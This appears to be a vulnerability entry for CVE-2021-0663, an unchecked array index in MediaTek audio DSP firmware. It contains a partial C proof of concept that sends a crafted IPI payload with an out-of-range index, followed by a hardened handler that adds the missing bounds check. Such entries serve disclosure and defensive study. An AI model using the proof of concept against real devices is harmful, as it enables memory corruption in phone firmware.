CVE-2021-0663
Information
Improper validation of array index in the audio_dsp_hw_open_op function of the
MediaTek audio DSP firmware.
PoC:
#include <stdint.h>
#include <stdlib.h>

#define TASK_SCENE_DEEPBUFFER 8
#define AUDIO_DSP_TASK_PCM_PREPARE 0x203

/* open_drv(), send_ipi_dma() and MAX_IPI_MSG_PAYLOAD_SIZE are provided by the
 * harness and MediaTek headers described in the referenced write-up; they are
 * not reproduced here. */

int main(void)
{
    int32_t drv = -1;
    if (open_drv(drv) != 0)
        return 0;

    /* IPI message payload; the fields below sit at the offsets the DSP handler reads. */
    void* payload = malloc(MAX_IPI_MSG_PAYLOAD_SIZE);
    if (payload == NULL)
        return 0;
    *(uint32_t*)((uint8_t*)payload + 0x3C) = 1;      // AUDIO_DSP_TASK_PCM_HWPARAM_DL
    *(uint32_t*)((uint8_t*)payload + 0x50) = 1;      // it's a hardware buffer
    *(uint32_t*)((uint8_t*)payload + 0x54) = 0x1000; // the index (never bounds-checked)
    *(uint32_t*)((uint8_t*)payload + 0x58) = 1;      // IRQ number
    *(uint32_t*)((uint8_t*)payload + 0x5C) = 1;      // DRAM memory

    uint32_t base = 0x7d940000; // DMA physical address
    send_ipi_dma(drv, TASK_SCENE_DEEPBUFFER, AUDIO_DSP_TASK_PCM_PREPARE, 0xE0, base + 0x4600, payload);

    free(payload);
    return 0;
}
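As an added defender-side illustration, not part of this entry or of the referenced research: a hypothetical handler that parses a payload laid out at the same offsets the PoC writes and rejects an out-of-range index before it is used to select a table entry, which is the check the description says is missing. The field names, the table size NUM_HW_BUFFERS and the function names are assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical layout mirroring the offsets used by the PoC above
 * (assumption: names and table size are illustrative, not MediaTek's). */
#define IPI_PAYLOAD_SIZE 0xE0
#define OFF_MSG_ID       0x3C  /* AUDIO_DSP_TASK_PCM_HWPARAM_DL in the PoC */
#define OFF_IS_HW        0x50
#define OFF_HW_INDEX     0x54  /* caller-controlled array index */
#define OFF_IRQ          0x58
#define OFF_IS_DRAM      0x5C
#define NUM_HW_BUFFERS   8     /* hypothetical size of the indexed table */

typedef struct { uint32_t irq; uint32_t is_dram; } hw_buffer_t;
static hw_buffer_t hw_buffers[NUM_HW_BUFFERS];

/* Unaligned little-endian-agnostic 32-bit read from the message buffer. */
static uint32_t rd32(const uint8_t *p, size_t off) {
    uint32_t v; memcpy(&v, p + off, sizeof v); return v;
}

/* Hardened handler: every untrusted field is checked before it drives memory
 * access. Returns the index used on success, -1 if the message is rejected. */
int hw_open_checked(const uint8_t *payload, size_t len) {
    if (payload == NULL || len < IPI_PAYLOAD_SIZE) return -1; /* short message */
    if (rd32(payload, OFF_IS_HW) != 1) return -1;             /* not a HW buffer */
    uint32_t idx = rd32(payload, OFF_HW_INDEX);
    if (idx >= NUM_HW_BUFFERS) return -1;  /* the bounds check the bug lacks */
    hw_buffers[idx].irq = rd32(payload, OFF_IRQ);
    hw_buffers[idx].is_dram = rd32(payload, OFF_IS_DRAM);
    return (int)idx;
}

/* Builds a constructed sample payload in the shape the PoC sends. */
void build_payload(uint8_t *buf, uint32_t index) {
    uint32_t one = 1;
    memset(buf, 0, IPI_PAYLOAD_SIZE);
    memcpy(buf + OFF_MSG_ID, &one, sizeof one);
    memcpy(buf + OFF_IS_HW, &one, sizeof one);
    memcpy(buf + OFF_HW_INDEX, &index, sizeof index);
    memcpy(buf + OFF_IRQ, &one, sizeof one);
    memcpy(buf + OFF_IS_DRAM, &one, sizeof one);
}
```

With the PoC's index of 0x1000 the hardened handler returns -1 instead of indexing past the table; an in-range index is accepted and stored.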
References:
https://corp.mediatek.com/product-security-bulletin/October-2021
https://research.checkpoint.com/2021/looking-for-vulnerabilities-in-mediatek-audio-dsp